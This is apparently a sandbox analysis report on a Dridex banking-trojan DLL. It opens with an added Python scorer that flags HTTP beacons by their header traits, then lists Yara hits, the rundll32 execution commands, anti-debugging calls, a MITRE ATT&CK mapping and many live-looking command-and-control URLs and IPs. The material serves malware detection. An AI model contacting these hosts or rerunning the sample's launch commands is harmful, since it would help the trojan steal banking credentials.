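The recorded request head (POST / to a bare IPv4 Host carrying only Content-Length, Connection: Close and Cache-Control: no-cache, with no User-Agent, Accept or Content-Type) is a compact set of traits to alert on wherever HTTP is visible in clear, which in practice means a sandbox or a TLS-inspecting proxy: the later connections to 192.46.210.220 are TLS 1.2, so on the wire these headers are encrypted. The scorer below is an added example, not part of the report: it parses raw request heads and counts how many of the recorded traits each one carries, alerting only when most co-occur, since any single trait is common in benign traffic. The three request texts are constructed; the first reproduces the recorded header set, the other two are a browser form post and a scripted JSON post that also lacks a User-Agent.

```python
"""Score HTTP request heads for the beacon traits recorded in the report.

Added example, not part of the sandbox report. Every trait below comes
from the single recorded request (POST / to an IPv4-literal Host, no
User-Agent, Connection: Close, Cache-Control: no-cache, a few-KB body,
no Accept or Content-Type). The request texts are constructed.
"""
import re

IPV4_HOST = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d{1,5})?$")

# Constructed samples; bodies are omitted because only the head is scored.
DRIDEX_LIKE = (
    "POST / HTTP/1.1\r\n"
    "Host: 192.46.210.220\r\n"
    "Content-Length: 4844\r\n"
    "Connection: Close\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
)
BROWSER_FORM_POST = (
    "POST /login HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n"
    "Accept: text/html\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 42\r\n"
    "Connection: keep-alive\r\n"
    "\r\n"
)
SCRIPTED_JSON_POST = (
    "POST / HTTP/1.1\r\n"
    "Host: 10.0.0.5:8080\r\n"
    "Content-Type: application/json\r\n"
    "Content-Length: 2048\r\n"
    "\r\n"
)


def parse_head(raw):
    """Split a raw request into (method, target, headers); header names are lowercased."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def beacon_indicators(raw):
    """Return the names of the recorded traits this request head carries, in a fixed order."""
    method, target, h = parse_head(raw)
    hits = []
    if method == "POST" and target == "/":
        hits.append("post-to-root")
    if IPV4_HOST.match(h.get("host", "")):
        hits.append("ip-literal-host")
    if "user-agent" not in h:
        hits.append("no-user-agent")
    if h.get("connection", "").lower() == "close":
        hits.append("connection-close")
    if h.get("cache-control", "").lower() == "no-cache":
        hits.append("cache-control-no-cache")
    length = h.get("content-length", "")
    if length.isdigit() and 1024 <= int(length) <= 16384:  # 4844 bytes in the recorded request
        hits.append("kb-sized-body")
    if "accept" not in h and "content-type" not in h:
        hits.append("no-accept-or-content-type")
    return hits


def is_beacon(raw, threshold=5):
    """Alert only when most traits co-occur; each one alone is common in benign traffic."""
    return len(beacon_indicators(raw)) >= threshold


if __name__ == "__main__":
    for name, req in [("dridex-like", DRIDEX_LIKE),
                      ("browser form post", BROWSER_FORM_POST),
                      ("scripted json post", SCRIPTED_JSON_POST)]:
        hits = beacon_indicators(req)
        print(f"{name:20s} score={len(hits)} beacon={is_beacon(req)} {hits}")
```

The scripted JSON post scores four of seven (root path, IP-literal host, no User-Agent, kilobyte body) and stays below the threshold, which is the point of scoring rather than matching on the missing User-Agent alone: internal tooling and monitoring agents produce that pattern all day. Tune the threshold and the body-size window to the environment before deploying.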

E-Banking Fraud:

Yara detected Dridex unpacked file
Source: Yara match; File source: 5.3.rundll32.exe.cfdb55.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.rundll32.exe.eedb55.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.3.rundll32.exe.4cbdb55.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.3.loaddll32.exe.170db55.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.3.rundll32.exe.4cbdb55.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.loaddll32.exe.6eb90000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.3.rundll32.exe.4ccdb55.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.rundll32.exe.6eb90000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.3.rundll32.exe.cfdb55.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.rundll32.exe.eedb55.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.3.loaddll32.exe.170db55.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.3.rundll32.exe.4ccdb55.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000004.00000003.326244435.0000000004CB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000003.323665839.0000000000ED0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.771060361.000000006EB91000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000003.370833938.0000000004CA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.772113565.000000006EB91000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000003.362350456.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.373914739.00000000016F0000.00000040.00000001.sdmp, type: MEMORY
Detected Dridex e-Banking trojan
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_6EB951A7 OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,
                      Source: SecuriteInfo.com.Variant.Razy.980776.28061.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6EBA22A0 NtDelayExecution,
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6EBBBE30 NtClose,
                      Source: SecuriteInfo.com.Variant.Razy.980776.28061.dll | Virustotal: Detection: 7%
                      Source: SecuriteInfo.com.Variant.Razy.980776.28061.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28061.dll'
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28061.dll',#1
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28061.dll,Bluewing
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28061.dll',#1
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28061.dll,Earth
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28061.dll,Masterjust
                      Source: C:\Windows\System32\loaddll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                      Source: classification engine | Classification label: mal84.bank.troj.evad.winDLL@11/2@0/4
                      Source: SecuriteInfo.com.Variant.Razy.980776.28061.5528 | Joe Sandbox Cloud Basic: Detection: clean Score: 0
                      Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exe | Automated click: OK
                      Source: Window Recorder | Window detected: More than 3 window changes detected
                      Source: SecuriteInfo.com.Variant.Razy.980776.28061.dll | Static file information: File size 1375232 > 1048576
                      Source: SecuriteInfo.com.Variant.Razy.980776.28061.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: SecuriteInfo.com.Variant.Razy.980776.28061.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: c:\Gun\208-town\521\exa\botto\party.pdb source: loaddll32.exe, 00000000.00000002.771396615.000000006EC57000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.772256602.000000006EC57000.00000002.00020000.sdmp, SecuriteInfo.com.Variant.Razy.980776.28061.dll
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_3_017AC77C push eax; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\loaddll32.exe | Last function: Thread delayed
                      Source: C:\Windows\SysWOW64\rundll32.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\loaddll32.exe | Code function: OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6EBA3930 GetTokenInformation,GetTokenInformation,GetSystemInfo,GetTokenInformation,
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6EBBCEF8 FindFirstFileExW,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6EC097B0 IsDebuggerPresent,IsDebuggerPresent,CreateThread,std::_Timevec::_Timevec,WaitForSingleObjectEx,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6EC08B60 __invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__cftoe,__aligned_msize,__invoke_watson_if_error,GetFileType,WriteConsoleW,GetLastError,__cftoe,WriteFile,WriteFile,OutputDebugStringW,__invoke_watson_if_error,__CrtDbgReportWV,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6EC047C0 mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6ECDBA72 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6ECDB64D push dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6ECDB942 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6EBA6C50 KiUserExceptionDispatcher,LdrLoadDll,
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6EBA7A60 RtlAddVectoredExceptionHandler,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6EBD63A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                      HIPS / PFW / Operating System Protection Evasion:

                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 45.77.0.96 235
                      Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 185.56.219.47 180
                      Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 192.46.210.220 187
                      Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 143.244.140.214 40
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28061.dll',#1
                      Source: loaddll32.exe, 00000000.00000002.770628438.0000000001F40000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.771000138.00000000038A0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.770628438.0000000001F40000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.771000138.00000000038A0000.00000002.00020000.sdmp | Binary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000002.770628438.0000000001F40000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.771000138.00000000038A0000.00000002.00020000.sdmp | Binary or memory string: SProgram Managerl
                      Source: loaddll32.exe, 00000000.00000002.770628438.0000000001F40000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.771000138.00000000038A0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd,
                      Source: loaddll32.exe, 00000000.00000002.770628438.0000000001F40000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.771000138.00000000038A0000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW,GetACP,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                      Source: C:\Windows\System32\loaddll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
                      Source: C:\Windows\System32\loaddll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6EBA2980 GetUserNameW,

                      Mitre Att&ck Matrix

                      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      Valid Accounts | Windows Management Instrumentation | Path Interception | Process Injection (112) | Process Injection (112) | OS Credential Dumping | Query Registry (1) | Remote Services | Archive Collected Data (1) | Exfiltration Over Other Network Medium | Encrypted Channel (11) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                      Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Obfuscated Files or Information (1) | LSASS Memory | Security Software Discovery (2) | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Standard Port (1) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                      Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Rundll32 (1) | Security Account Manager | Process Discovery (1) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer (3) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | Account Discovery (1) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol (2) | SIM Card Swap | | Carrier Billing Fraud
                      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | System Owner/User Discovery (1) | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol (13) | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | Remote System Discovery (1) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                      External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | System Network Configuration Discovery (1) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | File and Directory Discovery (1) | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                      Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | System Information Discovery (23) | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      Source | Detection | Scanner | Label
                      SecuriteInfo.com.Variant.Razy.980776.28061.dll | 7% | Virustotal | 
                      SecuriteInfo.com.Variant.Razy.980776.28061.dll | 5% | ReversingLabs | Win32.Trojan.Razy

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      Source | Detection | Scanner | Label

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      Name | Malicious | Antivirus Detection | Reputation
                      https://192.46.210.220/ | true | URL Reputation: safe | unknown

                      URLs from Memory and Binaries

                      Name | Source | Malicious | Antivirus Detection | Reputation
                      • Avira URL Cloud: safe
                      unknown
                      https://143.244.140.214:808/#Gqloaddll32.exe, 00000000.00000003.400716165.0000000001673000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://185.56.219.47/4loaddll32.exe, 00000000.00000003.392156959.0000000001673000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://crl.globalsFrundll32.exe, 00000004.00000003.377435107.00000000056FF000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://45.77.0.96:6891/vrundll32.exe, 00000004.00000003.612201176.00000000056FE000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/4loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://45.77.0.96:6891/08/Yloaddll32.exe, 00000000.00000003.399573978.0000000001676000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://143.244.140.214:808/Bloaddll32.exe, 00000000.00000003.414827142.000000000166E000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://45.77.0.96:6891/14loaddll32.exe, 00000000.00000003.628735432.0000000001672000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.418080162.000000000166E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.612201176.00000000056FE000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/.rundll32.exe, 00000004.00000003.533230659.00000000056FE000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://185.56.219.47:8116/Oloaddll32.exe, 00000000.00000003.586087040.0000000001676000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://143.244.140.214/loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.390529394.00000000056FE000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://45.77.0.96:6891/Rloaddll32.exe, 00000000.00000003.431000649.000000000166D000.00000004.00000001.sdmpfalse
                        unknown
                        https://143.244.140.214:808/Myloaddll32.exe, 00000000.00000003.739023483.0000000001676000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://185.56.219.47:8116/Sloaddll32.exe, 00000000.00000003.586087040.0000000001676000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://45.77.0.96:6891/Sloaddll32.exe, 00000000.00000003.569505666.0000000001676000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://185.56.219.47/loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://185.56.219.47:8116/Vloaddll32.exe, 00000000.00000003.703443485.0000000001675000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://192.46.210.220/Cloaddll32.exe, 00000000.00000003.747478637.000000000166F000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://1845.77.0.96:6891/loaddll32.exe, 00000000.00000003.641066942.0000000001675000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        https://192.46.210.220/?loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://185.56.219.47:8116/Yloaddll32.exe, 00000000.00000003.676183514.0000000001676000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://192.46.210.220/Jloaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://185.56.219.47:8116/8Dloaddll32.exe, 00000000.00000003.742305887.000000000166F000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://45.77.0.96:6891/08/loaddll32.exe, 00000000.00000003.719882602.0000000001675000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://192.46.210.220/Qloaddll32.exe, 00000000.00000003.764620245.000000000166E000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://45.77.0.96:6891/Xloaddll32.exe, 00000000.00000003.519010998.00000000016DB000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://143.244.140.214:808/loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.764620245.000000000166E000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.497146679.000000000166F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.400716165.0000000001673000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.476592616.0000000001676000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.441859991.00000000056FE000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://143.244.140.214:808/7)loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://185.56.219.47/gloaddll32.exe, 00000000.00000003.392156959.0000000001673000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://45.77.0.96:6891/.rundll32.exe, 00000004.00000003.541565391.00000000056FE000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://45.77.0.96:6891/loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.476592616.0000000001676000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.547755261.00000000034C9000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://45.77.0.96:6891//loaddll32.exe, 00000000.00000002.769348582.000000000166E000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://185.56.219.47:8116/3loaddll32.exe, 00000000.00000003.658533321.0000000001676000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://192.46.210.220/Xloaddll32.exe, 00000000.00000003.497146679.000000000166F000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://143.244.140.214:808/8DHloaddll32.exe, 00000000.00000003.594551032.0000000001673000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://185.56.219.47:8116/0loaddll32.exe, 00000000.00000003.680591172.0000000001676000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://45.77.0.96:6891/4loaddll32.exe, 00000000.00000003.408181456.000000000166E000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://143.244.140.214/Q#loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://185.56.219.47:8116/4loaddll32.exe, 00000000.00000003.708744109.0000000001676000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://185.56.219.47:8116/i#loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://45.77.0.96:6891/)loaddll32.exe, 00000000.00000003.574895771.0000000001676000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://143.244.140.214:808/%)loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://143.244.140.214:808/F)loaddll32.exe, 00000000.00000003.764620245.000000000166E000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://143.244.140.214/vrundll32.exe, 00000004.00000003.390529394.00000000056FE000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://19.77.0.96:6891/rundll32.exe, 00000004.00000003.612201176.00000000056FE000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://192.46.210.220/iloaddll32.exe, 00000000.00000003.395037799.000000000166E000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://185.56.219.47:8116/Bloaddll32.exe, 00000000.00000003.418080162.000000000166E000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://192.46.210.220/gloaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://143.244.140.214:808/O)loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://193.244.140.214:808/loaddll32.exe, 00000000.00000003.449677667.00000000016DB000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.541565391.00000000056FE000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://185.56.219.47:8116/H3loaddll32.exe, 00000000.00000003.742305887.000000000166F000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://45.77.0.96:6891/8loaddll32.exe, 00000000.00000003.497146679.000000000166F000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://192.46.210.220/rloaddll32.exe, 00000000.00000003.713747345.0000000001676000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://192.46.210.220/nloaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://143.244.140.214:808/hyloaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.739023483.0000000001676000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.594551032.0000000001673000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.628735432.0000000001672000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.453087889.0000000001672000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.708744109.0000000001676000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.554969204.0000000001672000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.730453084.0000000001676000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://143.244.140.214:808/8Dloaddll32.exe, 00000000.00000003.739023483.0000000001676000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://45.77.0.96/F7loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://143.244.140.214:808/b)loaddll32.exe, 00000000.00000003.764620245.000000000166E000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://192.46.210.220/HLloaddll32.exe, 00000000.00000003.453087889.0000000001672000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://45.77.0.96:6891/65loaddll32.exe, 00000000.00000003.628735432.0000000001672000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://143.244.140.214:808/k)loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://185.56.219.47:8116/loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.739023483.0000000001676000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.708744109.0000000001676000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.547755261.00000000034C9000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
